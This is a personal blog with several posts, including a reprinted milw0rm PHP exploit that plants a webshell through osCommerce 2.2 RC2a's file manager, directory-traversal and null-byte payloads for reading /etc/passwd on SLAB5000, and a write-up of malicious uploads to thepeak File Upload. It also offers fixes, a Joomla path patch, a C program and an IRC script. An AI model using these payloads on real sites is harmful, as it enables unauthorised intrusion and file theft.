Looking for Good Web Hosting

Search This Blog

Sunday, April 04, 2010

osCommerce Online Merchant 2.2 RC2a RCE Exploit and Fix

osCommerce Online Merchant 2.2 RC2a RCE Exploit


Fix
If you use are using osCommerce 2.2 RC2a that comes in some many webhosting packages by default, one solution from being hacked with the default installation is to add to the .httaccess
this line:



AuthName "Restricted Area" 
AuthType Basic 
AuthUserFile /home/yourusername/oscommerce-folder/admin/.htpasswd 
AuthGroupFile /dev/null 
require valid-user


and create an .htpasswd file with your admin username with this line:


admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1
(Note: the above password is 1234, do not use as your password)




Exploit
Code from milw0rm:



<?php
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]


Posted by at No comments:

Tuesday, March 23, 2010

Joomlalib issue about path (Dirty Solution)

Im not good writing so lets fix this.


Problem:
You have Joomla 1.5 and want to install Joomlalib with Gallery2 Bridge then when trying to install Joomlalib 1.3.2 you got this:


Warning: require_once(/components/com_joomlalib/classes/jlcoreapi.class) [function.require-once]: failed to open stream: No such file or directory in "yourpath"/administrator/components/com_joomlalib/install.joomlalib.php on line 11.


when trying to install Joomlalib 1.3.2


just replace this: 
require_once($mosConfig_absolute_path . '/components/com_joomlalib/classes/jlcoreapi.class');


with this:
require_once($yourjommlapath. '/components/com_joomlalib/classes/jlcoreapi.class');


$yourjommlapath could be: /home/user/jommla


maybe late i could format this post :)
Posted by at 1 comment:
Labels: , , ,

Tuesday, October 03, 2006

3n + 1 problem

#include

int main(void)
{
int num;
printf("insert number:\n");
scanf("%d", &num);
printf("%d ", num);
while(num != 1)
{
if ((num%2) == 0)
{
num = num / 2;
}
else
{
num = (3 * num) + 1;
}
printf("%d ", num);
}
printf("\n");
}
Posted by at 1 comment:

Sunday, April 23, 2006

Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

[Description]
SLAB500 is a complete, dynamic, modular web-system designed to your specifications, allowing you to quickly and conveniently update all your content, add new pages, upload images, sounds and video from any browser, via our front-end interface from any location that you have web access.
-- taken from they website http://www.slab5000.com --

I discover 2 bugs one known as "path disclosure" and Arbitrary File Read Vulnerability in the SLAB5000 Content Management System that allow malicious attacker to read sensitive information about the system.

[Path Disclosure]
Due to improper sanity checks in the variable $page:

http://www.server.com/index.php?page=../../../var

Warning: main(/usr/www/users/username/slab500/common/../../../var/index.php): failed to open stream: No such file or directory in /usr/www/users/usernameb/slab500/folder/index.php on line 63

[File Read]

Due to imporper sanity inputs checks too, just adding the NULL byte and the end of the file:

http://www.server.com/index.php?page=../../../../../etc/passwd%00

[Solution]
Edit the source to do sanity input checks as well.

Sorry if my english is bad :)

Justin_T
irc: #nt at Undernet
shoutz: warcold, KrOsS, HoOH, lsdx, jsz, and all the guyz from DO.
Posted by at No comments:

a path disclosure and a posibility file inclusion and vulneability in thepeak file upload v1.3

Justin_T

#NT - Undernet

justint (at) orangemail.com (dot) do [email concealed]

hi,

there is a posiblity path disclosure and run commands on a server usint thepeak File Upload v1.3

searching for /fileupload/index.php an attacker can upload a malicious jpg of gif and can execute commands or make a file inclusion,

but it cant be directly to upload a php file with .jpg extension, because detect the content type as text/plain, look this:

name : cmd.jpg

type : text/plain <--- when you upload the file the content type is seem like this

tmp_name : /tmp/phpF0AItw <-- this is a copy of the file in the server with a ramdom temp

error : 0

size : 26564

http://server.com/fileupload/store/cmd.jpg <--- this is where is stored the original file

there is a 2 ways to get in

cracking the content-type when uploading the file or constructing an malicious jpg image with some commands:

1: chmod the dir for file inclusion

2: run certain commands on server, etc

Path Disclosure

when you try to put in input of upload file something like

http://www.attacker.com/command.jpg its seem the path of the web files like this:

File Upload Manager v1.3 © thepeak

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 0

Warning: copy(store/http://www.attacker.com/cmd.gif): failed to open stream: No such file or directory in /home/user/public_html//fileupload/index.php on line 471

ERROR: cannot upload, please chmod the dir to 777

some servers accept the file inclusion and you get this

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 1035

file uploaded!

sorry for my english, is no good :), if you want to organizate this info i apreciated that, thanx :)
Posted by at No comments:

Tuesday, April 04, 2006

IRC Stuffs

; ––––––––––––––––––––––––––––––––––––––––; Put your own scripts in here.; ––––––––––––––––––––––––––––––––––––––––
on 1:input:*:{ if -ban isin $1- { //mode $chan +bbbb $2- haltdef } if .test isin $1- { //say i have %hackick.count kicks on #hack }}
on 1:JOIN:#hack:{ if $nick isreg #hack /notice $nick This is a hacking help channel, to see tools and all for hack type !hack}on 1:TEXT:!hack:#hack:{ if $nick isreg # { /ban #hack $address($nick, 1) inc %hackick.count kick #hack %hackick.count idiots served! }
}on 1:TEXT:*ý*:#hack:/kick #hack $nick english please
; ––––––––––––––––––––––––––––––––––––––––; End of file; ––––––––––––––––––––––––––––––––––––––––
Posted by at No comments:

Friday, November 04, 2005

Inicio

Im not a good writer but i will try :)

Justin_T
Posted by at No comments:
Subscribe to: Posts (Atom)